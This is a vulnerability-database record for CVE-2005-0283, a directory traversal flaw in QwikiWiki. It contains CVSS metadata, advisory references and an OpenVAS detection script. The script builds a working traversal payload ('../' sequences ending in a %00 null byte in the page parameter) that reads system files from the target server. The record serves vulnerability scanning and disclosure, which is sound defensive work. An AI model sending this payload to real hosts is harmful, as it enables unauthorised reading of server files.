{"cve": [{"lastseen": "2020-10-03T11:34:52", "description": "Directory traversal vulnerability in index.php in QwikiWiki allows remote attackers to read arbitrary files via a .. (dot dot) and a %00 at the end of the filename in the page parameter.", "edition": 3, "cvss3": {}, "published": "2005-01-04T05:00:00", "title": "CVE-2005-0283", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-0283"], "modified": "2017-07-11T01:32:00", "cpe": ["cpe:/a:david_barrett:qwikiwiki:1.4.1"], "id": "CVE-2005-0283", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0283", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:david_barrett:qwikiwiki:1.4.1:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:08", "bulletinFamily": "software", "cvelist": ["CVE-2005-0283"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1012767\n[Secunia Advisory ID:12044](https://secuniaresearch.flexerasoftware.com/advisories/12044/)\nOther Advisory URL: http://www.qwikiwiki.com/index.php?page=QwikiVulnerability\n[Nessus Plugin ID:16100](https://vulners.com/search?query=pluginID:16100)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-01/0013.html\nISS X-Force ID: 18748\n[CVE-2005-0283](https://vulners.com/cve/CVE-2005-0283)\n", "modified": "2005-01-04T10:51:37", "published": "2005-01-04T10:51:37", "href": "https://vulners.com/osvdb/OSVDB:12712", "id": "OSVDB:12712", "type": "osvdb", "title": "QwikiWiki index.php Traversal Arbitrary File Retrieval", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2020-05-08T16:40:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0283"], "description": "The remote host is running QWikiwiki, a Wiki application written in PHP.\n\n The remote version of this software contains a validation input flaw which may allow an attacker\n to use it to read arbitrary files on the remote host with the privileges of the web server.", "modified": "2020-05-06T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231016100", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231016100", "type": "openvas", "title": "QWikiwiki directory traversal vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# QWikiwiki directory traversal vulnerability\n#\n# Authors:\n# Noam Rathaus\n#\n# Copyright:\n# Copyright (C) 2005 Noam Rathaus\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\n#From: Madelman <madelman@iname.com>\n#QWikiwiki directory traversal vulnerability\n# Date: 2005-01-04 21:31\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.16100\");\n script_version(\"2020-05-06T07:10:15+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 07:10:15 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2005-0283\");\n script_bugtraq_id(12163);\n script_name(\"QWikiwiki directory traversal vulnerability\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2005 Noam Rathaus\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"The remote host is running QWikiwiki, a Wiki application written in PHP.\n\n The remote version of this software contains a validation input flaw which may allow an attacker\n to use it to read arbitrary files on the remote host with the privileges of the web server.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\nif( ! http_can_host_php( port:port ) ) exit( 0 );\n\nfiles = traversal_files();\n\nforeach dir( make_list_unique( \"/\", http_cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n\n foreach file( keys( files ) ) {\n\n url = dir + '/index.php?page=../../../../../../../../../../../' + files[file] +'%00';\n\n if( http_vuln_check( port:port, url:url, pattern:file ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}